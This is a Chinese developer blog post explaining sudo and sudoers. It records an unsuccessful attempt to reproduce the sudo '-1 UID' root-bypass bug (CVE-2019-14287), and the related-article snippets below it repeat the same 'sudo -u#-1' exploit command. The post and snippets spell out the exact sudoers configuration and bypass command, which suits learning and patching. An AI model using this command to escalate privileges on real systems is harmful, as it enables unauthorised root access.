天呐,经常用的sudo居然有漏洞?

最新推荐文章于 2024-05-29 10:30:28 发布
最新推荐文章于 2024-05-29 10:30:28 发布
阅读量1.5k 收藏 3
点赞数
分类专栏: 其它 文章标签: root sudo 漏洞 #-1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pony_maggie/article/details/102669164
版权

这两天看到一个新闻让我很是震惊,linux上最常用的命令之一, sudo 命令居然被爆出有安全漏洞。作为一个程序员,可以说几乎天天和这个命令打交道,哪能想到这么成熟的命令工具居然隐藏着安全漏洞。

sudo介绍

大部分开发运维对这个命令都非常熟悉,不过考虑到有效读者不了解我还是简单介绍下。

sudo 指“超级用户”。作为一个系统命令,其允许其它非 root 用户以特殊权限来运行程序或命令,而无需切换使用环境。举个例子:

我下面已一个普通用户在 /usr/local/ 目录下新建一个目录,直接运行会报没有权限的错误,

user1@user1:/usr/local$ mkdir test
mkdir: cannot create directory ‘test’: Permission denied

必须要这样才可以,

user1@user1:/usr/local$ sudo mkdir test
user1@user1:/usr/local$ ls
bin  etc  games  include  lib  man  sbin  share  src  test

一个普通用户要想使用sudo,必须有管理员(root)配置 sudoers 文件,对用户的权限进行定义。类似下面这样:

# User privilege specification
user2    ALL=(ALL:ALL) ALL

上述命令中:

  • user2 表示用户名
  • 第一个 ALL 指示允许从任何终端、机器访问 sudo
  • 第二个 (ALL:ALL) 指示 sudo 命令被允许以任何用户身份执行,后面那个ALL是用户所在的群组
  • 第三个 ALL 表示所有命令都可以作为 root 执行

如果没有加这个配置,执行的时候会报如下的错误:

user2@pony:/home$ sudo mkdir test2
[sudo] password for user2: 
user2 is not in the sudoers file.  This incident will be reported.

如何利用漏洞

我根据下面这篇文章,进行问题复现,

https://www.sudo.ws/alerts/minus_1_uid.html

我使用的linux版本是 Ubuntu 18.04.3 LTS 。

首先我配置用户 user2 的权限,

# User privilege specification
user2    ALL=(ALL,!root) /bin/bash

这个配置的意思是,user2用户可以用任何用户(除了root)执行 /bin/bash 命令。

然后我试着执行,

user2@pony:~$ sudo -u#-1 /bin/bash
sudo: unknown user: #-1
sudo: unable to initialize policy plugin

什么鬼,好像没有啥问题啊,直接报错了,并没有切换到 root 用户,再试着执行,

user2@pony:~$ sudo -u#-1 id -u
sudo: unknown user: #-1
sudo: unable to initialize policy plugin

也没有任何问题啊,那这个漏洞究竟该怎么复现呢??

按照上面文章的说法,之所以会产生这个漏洞,是因为将用户 ID 转换为用户名的函数会将 -1(或无效等效的 4294967295)误认为是 0,而这正好是 root 的用户 ID 。

但是,我实际操作发现并复现到这个漏洞。感觉应该是我哪里配置的不对?

总结

我也不知道为啥我复现不了问题。请大神执教!

E等于MC平方
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Linux曝出Sudo提权漏洞 任意用户亦可运行root命令
01-10
然而近期曝出的一个提权漏洞,却直指 sudo 的一个安全策略隐患 —— 即便配置中明确不允许 root 用户访问,该漏洞仍可允许恶意用户或程序,在目标 Linux 系统上以 root 用户身份执行任意命令。 (题图 via Hacker ...
Linux sudo 漏洞可能导致未经授权的特权访问
01-20
在 Linux 中利用新发现的 sudo 漏洞可以使某些用户以 root 身份运行命令,尽管对此还有所限制。 sudo 命令中最近发现了一个严重漏洞,如果被利用,普通用户可以 root 身份运行命令,即使在 /etc/sudoers 文件中明确...
增加普通用户的sudo权限,禁止root用户登录
千里之行,始于足下
02-26 2293
假如增加用户zhangsan的sudo权限。 修改/etc/sudoers文件,在root下增加如下一行。     增加用户名zhangsan:     禁止root用户登录: 修改/etc/ssh/sshd_config文件, 将 PermitRootLogin前的#号去掉,yes改为no,重启network。     按照以上方法,root用户将不能登录,则使
Linux sudo权限绕过漏洞详解
最新发布
xuezhangmen的博客
05-29 204
虽然各大平台已经把核心的东西晒出来了,但是,因为目前没有说的特别完整的,所以,笔者研究一番后,总算是把这个过程都弄明白了。从这里我们知道,要复现这个漏洞是有前提的,上文中作者赋予bob用户通过sudo命令执行vi命令的权利,但是只拥有除了root权限以外的权限,很明显,这样以来,是不能修改和访问root用户和用户组的文件的。OK,我们可以使用sudo vi修改文件了,但是现在没有root权限,所以无法修改root组的/etc/passwd文件。关于sudo的定义,我们就不细说了,不了解的小伙伴可以问度娘。
sudo指令提示当前user非root权限用户
limanjihe的专栏
12-22 2125
linux权限之su和sudo的差别 sudo指令提示当前user非root权限用户 su方式切换是须要输入root的password。而sudo仅仅须要输入自己的password,所以sudo能够保护root的password不外流的。当帮root管理系统的时候,su是直接将root全部权利交给用户。而sudo能够更好分工,仅仅要配置好/etc/sudoers,这样sudo能够保护系统更安全,并且分工明白,有条不紊。 将user添加到Allow members of group sudo to exec
Linux 执行sudo命令失败
qq_37004052的博客
03-11 3341
一、报错信息 sudo: /etc/sudo.conf is world writable sudo: /etc/sudo.conf is world writable sudo: /etc/sudoers is world writable sudo: no valid sudoers sources found, quitting sudo: unable to initialize po...
ubuntu终端su认证失败:允许su到root的方法
06-28 948
Ubuntu 安装后,root用户默认被锁定,不允许登录,也不允许“su”到 root。对于桌面用户来说,这样安全性更高一些,但对于服务器可以设置成“允许 su 到root,但不允许root用户直接登录”。为了开发时的方便,我们常希望都采用这种方式,那么我们应该怎么办呢?请参考本文讨论的方法与建议 。 1、允许 su 到 root 非常简单,下面是设置的方法: simpson@ubun
Sudo缓冲区溢出漏洞(CVE-2021-3156)
04-06
linux sudo升级为1.9.5p2 及以上版本,sudo-1.9.10-1.el7.x86_64.rpm
centos6-sudo-1.9.9.rpm包;修复CVE-2021-3156,Sudo堆缓冲区溢出漏洞
01-30
此为centos6版的最新sudo-1.9.9.rpm包,修复修复CVE-2021-3156漏洞。 升级步骤: 1、将RPM包上传到服务器上, 2、执行升级命令: # rpm -Uvh sudo-1.9.9-1.el6.x86_64.rpm 3、执行完毕后,查询sudo版本: # sudo -V
centos7-sudo-1.9.9.rpm包。修复CVE-2021-3156,Sudo堆缓冲区溢出漏洞
01-30
此为centos7版的最新sudo-1.9.9.rpm包,修复修复CVE-2021-3156漏洞。 升级步骤: 1、将RPM包上传到服务器上, 2、执行升级命令: # rpm -Uvh sudo-1.9.9-1.el7.x86_64.rpm 3、执行完毕后,查询sudo版本: # sudo -V
sudo-1.9.12p1,解决cve-2022-43995
11-08
sudo是一个在Unix和Linux系统中广泛使用的命令行工具,它允许用户以其他用户(通常是root)的权限执行命令。"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **...
CVE-2021-3156:Sudo男爵Samedit漏洞
03-25
CVE-2021-3156(Sudo男爵Samedit) 该存储库是针对Linux x64的CVE-2021-3156漏洞利用。 如需撰写文章,请访问 。 档案文件 使用tcache在glibc上利用 exploit_nss.py自动检测/etc/nsswitch.conf中的所有要求和条目数...
如何解决基于sudo堆的缓冲区溢出漏洞:如何解决基于Sudo堆的缓冲区溢出漏洞— CVE-2021-3156?
02-12
如何解决基于Sudo堆的缓冲区溢出漏洞-CVE-2021-3156? sudo基于堆的缓冲区溢出漏洞— CVE-2021-3156原始发行日期:2021年2月2日Sudo发布了一个针对基于堆的缓冲区溢出漏洞CVE-2021-3156的公告,该公告影响sudo旧版...
sudo-1.9.13p3.tar.gz
03-31
- **日志监控**:sudo的日志功能有助于检测异常活动和潜在的攻击。 - **安全更新**:像1.9.13p3这样的版本更新通常包含对已知安全漏洞的修复,保护系统免受利用。 3. **sudo-1.9.13p3中的变化**: - **安全修复*...
sudo 命令报错的解决方法
weixin_30484739的博客
04-30 922
尝试着用终端打开Mac的安全权限(sudo spctl --master-disable),却显示以下提示,望高手解答。sudo: /etc/sudoers is world writablesudo: no valid sudoers sources found, quittingsudo: unable to initialize policy plugin 解决: 打开Fin...
亲测有效sudo: /etc/sudoers is world writable sudo: no valid sudoers sources found, quitting sudo: una
qq_41672817的博客
03-04 3234
mac是真的坑(以下是错误信息) sudo: /etc/sudoers is world writable sudo: no valid sudoers sources found, quitting sudo: unable to initialize policy plugin (以下是解决方法步骤) 1.在Mac中启动root 账户 https://jingyan.baid...
用户su权限被拒绝
m0_72866386的博客
06-05 6901
【代码】用户su权限被拒绝。
linux sudo提权漏洞,linux CVE-2019-14287 Sudo提权漏洞(示例代码)
05-19
CVE-2019-14287是一个sudo提权漏洞,攻击者可以利用此漏洞绕过sudo的限制,以root用户的身份执行命令。这个漏洞影响sudo 1.8.28版本之前的所有版本。下面是一个示例代码: ``` $ sudo -u#-1 id uid=0(root) gid=0...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值